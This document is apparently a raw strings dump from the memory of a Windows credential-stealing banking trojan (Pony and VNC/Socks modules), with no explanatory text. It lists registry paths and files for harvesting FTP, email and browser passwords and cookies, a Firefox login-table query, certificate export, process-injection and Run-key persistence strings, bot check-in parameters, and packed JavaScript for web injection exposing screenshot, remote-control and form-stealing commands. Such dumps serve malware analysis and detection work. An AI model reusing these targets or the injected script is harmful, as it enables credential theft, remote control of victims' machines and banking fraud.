Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
Server.Pass
Server.Host
Server.User
Server.Port
Last Server Pass
Last Server Port
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Email Address
SMTP Server
SMTP User Name
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
HttpAddRequestHeadersA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
COMDLG32.dll
WININET.DLL
&.ipO
;&;,;3;^;
:$:,:7:?:
9”9C9
.pdata
@.reloc
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll
conhost.exe_1656_rwx_01E90000_0007E000:
.text
`.rdata
@.data
.reloc
HHt.HHt
hu2.iuj
More information: hXXp://VVV.ibsensoftware.com/
8HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('k N(j){0.F=j;0.w=p;0.O=2;0.m=k(a,b,c,d){u f=W J();u g=0;u h=(y(d)==\'G\')?t:q;u b=\'/\' 0.F \'/\' Q.V() \'/\' b;u i=p;o(h==q){0.w=p;f.I=k(){C{o(f.A==4){o(f.E!=H||f.x==\'-\'){g.w=t;o(y(d)=="k"){d(t)}}z{o(f.x==\' \'){g.w=q;o(y(d)=="k"){d(q)}}z{g.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){g.w=t;o(y(d)=="k"){d(t)}}}}f.K(a,b,h);f.L(c);o(h==q){l q}C{o(f.A==4&&f.E==H){o(f.x==\'-\'){l t}z{o(f.x==\' \'){l q}z{l f.x}}}l t}B(e){l t}};0.M=k(){l 0.w};0.1l=k(a,b,c){l 0.m(\'s\',\'1/\' a,b,c)};0.P=k(a,b){l 0.m(\'v\',\'2/\' a,p,b)};0.R=k(a,b){l 0.m(\'v\',\'3/\' a,p,b)};0.T=k(a){l 0.m(\'v\',\'4/\',p,a)};0.U=k(a,b,c){l 0.m(\'v\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,p,c)};0.X=k(a,b,c,d){l 0.m(\'s\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.Y=k(a,b,c,d){o(y(c)==\'G\'||c==t){u e=p;u f=\'v\'}z{u e=\'Z: \' c;u f=\'s\'}l 0.m(f,\'6/\' ((b==q)?\'S\':\'D\') \'/\' a,e,d)};0.17=k(a,b,c,d){l 0.m(\'s\',\'7/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.18=k(a,b,c,d){l 0.m(\'v\',\'8/\' b \'/\' c \'/\' 19(a),p,d)};0.1a=k(a,b){l 0.m(\'s\',\'9/\',a,b)};0.1b=k(a){l 0.m(\'v\',\'10/\',p,a)};0.1c=k(a,b){l 0.m(\'s\',\'11/\',a,b)};0.1d=k(a,b){l 0.m(\'s\',\'12/\',a,b)};0.1e=k(a,b,c){l 0.m(\'s\',\'13/\',a "\\r\\n" b,c)};0.1f=k(a,b){l 0.m(\'s\',\'14/\' a,1g.1h.1i,b)};0.1j=k(a){l 0.m(\'v\',\'15/\',p,a)};0.1k=k(a,b){l 0.m(\'s\',\'16/\',a,b)}};',62,84,'this||||||||||||||||||||function|return|Query||if|null|true||POST|false|var|GET|_LastAsync|responseText|typeof|else|readyState|catch|try||status|_Key|undefined|200|onreadystatechange|XMLHttpRequest|open|send|GetLastAsync|EQFramework|Version|GetVal|Math|DelVal||ClearVals|GetServer|random|new|PostServer|Get|Cookie||||||||Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|document|location|href|StopVideo|ExecVBS|SetVal'.split('|'),0,{}));
eval('var %s '
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=C j(){0.1h=o;0.w=o;0.O=3;0.l=j(a,b,c,d){s f=C L();s g=0;s h=(x(d)==\'G\')?t:p;s b=\'/\' 0.R \'/\' W.X() \'/\' b;s i=o;m(h==p){0.w=o;f.I=j(){A{m(f.B==4){m(f.E!=F||f.v==\'-\'){g.w=t;m(x(d)=="j"){d(t)}}y{m(f.v==\' \'){g.w=p;m(x(d)=="j"){d(p)}}y{g.w=f.v;m(x(d)=="j"){d(f.v)}}}}}z(e){g.w=t;m(x(d)=="j"){d(t)}}}}f.J(a,b,h);f.K(c);m(h==p){k p}A{m(f.B==4&&f.E==F){m(f.v==\'-\'){k t}y{m(f.v==\' \'){k p}y{k f.v}}}k t}z(e){k t}};0.M=j(){k 0.w};0.N=j(a,b,c){k 0.l(\'q\',\'1/\' a,b,c)};0.Q=j(a,b){k 0.l(\'u\',\'2/\' a,o,b)};0.T=j(a,b){k 0.l(\'u\',\'3/\' a,o,b)};0.U=j(a){k 0.l(\'u\',\'4/\',o,a)};0.V=j(a,b,c){k 0.l(\'u\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,o,c)};0.Y=j(a,b,c,d){k 0.l(\'q\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.Z=j(a,b,c,d){m(x(c)==\'G\'||c==t){s e=o;s f=\'u\'}y{s e=\'17: \' c;s f=\'q\'}k 0.l(f,\'6/\' ((b==p)?\'S\':\'D\') \'/\' a,e,d)};0.18=j(a,b,c,d){k 0.l(\'q\',\'7/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.19=j(a,b,c,d){k 0.l(\'u\',\'8/\' b \'/\' c \'/\' 1a(a),o,d)};0.1b=j(a,b){k 0.l(\'q\',\'9/\',a,b)};0.1c=j(a){k 0.l(\'u\',\'10/\',o,a)};0.1d=j(a,b){k 0.l(\'q\',\'11/\',a,b)};0.1e=j(a,b){k 0.l(\'q\',\'12/\',a,b)};0.1f=j(a,b,c){k 0.l(\'q\',\'13/\',a "\\r\\n" b,c)};0.1g=j(a,b){k 0.l(\'q\',\'14/\' a,H.1i.1j,b)};0.1k=j(a){k 0.l(\'u\',\'15/\',o,a)};0.1l=j(a,b){k 0.l(\'q\',\'16/\',a,b)};0.1m=j(a){s b=H.1n(a);b.1o.P(b)}};',62,87,'this|||||||||||||||||||function|return|Query|if||null|true|POST||var|false|GET|responseText|_LastAsync|typeof|else|catch|try|readyState|new||status|200|undefined|document|onreadystatechange|open|send|XMLHttpRequest|GetLastAsync|SetVal|Version|removeChild|GetVal|_Key||DelVal|ClearVals|GetServer|Math|random|PostServer|Get||||||||Cookie|Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|Key|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("layers.acceleration.disabled", true);
user_pref("gfx.direct2d.disabled", true);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
account.cfg
account.cfn
Dir #%u
<POP3_Password2
<SMTP_Password2
<IMAP_Password2
<HTTPMail_Password2
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
Server.Pass
Server.Host
Server.User
Server.Port
Last Server Pass
Last Server Port
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Email Address
SMTP Server
SMTP User Name
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
HttpAddRequestHeadersA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
COMDLG32.dll
WININET.DLL
N.UAE
C:\ProgramData\LibxaJximb\QamzEsom.ijv
{687F46D2-25E5-43B6-BD95-68B725074F1D}
{0AE625D1-61C9-42E5-AEF4-7154387F4248}
{6B376189-11A2-4F58-96A6-001E03862004}
\\.\pipe\{19312A96-768E-4560-A72B-03BE621D2CDF}
D{0AE625D1-61C9-42E5-AEF4-7154387F4248}
{23DC640D-793E-4D8F-955D-2E6215F37B91}
U{687F46D2-25E5-43B6-BD95-68B725074F1D}
546B5A02-5978-4B96-802A-4C514A243A08
;&;,;3;^;
:$:,:7:?:
9”9C9
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
TPAutoConnSvc.exe_1676_rwx_00840000_00058000:
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
8HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('k N(j){0.F=j;0.w=p;0.O=2;0.m=k(a,b,c,d){u f=W J();u g=0;u h=(y(d)==\'G\')?t:q;u b=\'/\' 0.F \'/\' Q.V() \'/\' b;u i=p;o(h==q){0.w=p;f.I=k(){C{o(f.A==4){o(f.E!=H||f.x==\'-\'){g.w=t;o(y(d)=="k"){d(t)}}z{o(f.x==\' \'){g.w=q;o(y(d)=="k"){d(q)}}z{g.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){g.w=t;o(y(d)=="k"){d(t)}}}}f.K(a,b,h);f.L(c);o(h==q){l q}C{o(f.A==4&&f.E==H){o(f.x==\'-\'){l t}z{o(f.x==\' \'){l q}z{l f.x}}}l t}B(e){l t}};0.M=k(){l 0.w};0.1l=k(a,b,c){l 0.m(\'s\',\'1/\' a,b,c)};0.P=k(a,b){l 0.m(\'v\',\'2/\' a,p,b)};0.R=k(a,b){l 0.m(\'v\',\'3/\' a,p,b)};0.T=k(a){l 0.m(\'v\',\'4/\',p,a)};0.U=k(a,b,c){l 0.m(\'v\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,p,c)};0.X=k(a,b,c,d){l 0.m(\'s\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.Y=k(a,b,c,d){o(y(c)==\'G\'||c==t){u e=p;u f=\'v\'}z{u e=\'Z: \' c;u f=\'s\'}l 0.m(f,\'6/\' ((b==q)?\'S\':\'D\') \'/\' a,e,d)};0.17=k(a,b,c,d){l 0.m(\'s\',\'7/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.18=k(a,b,c,d){l 0.m(\'v\',\'8/\' b \'/\' c \'/\' 19(a),p,d)};0.1a=k(a,b){l 0.m(\'s\',\'9/\',a,b)};0.1b=k(a){l 0.m(\'v\',\'10/\',p,a)};0.1c=k(a,b){l 0.m(\'s\',\'11/\',a,b)};0.1d=k(a,b){l 0.m(\'s\',\'12/\',a,b)};0.1e=k(a,b,c){l 0.m(\'s\',\'13/\',a "\\r\\n" b,c)};0.1f=k(a,b){l 0.m(\'s\',\'14/\' a,1g.1h.1i,b)};0.1j=k(a){l 0.m(\'v\',\'15/\',p,a)};0.1k=k(a,b){l 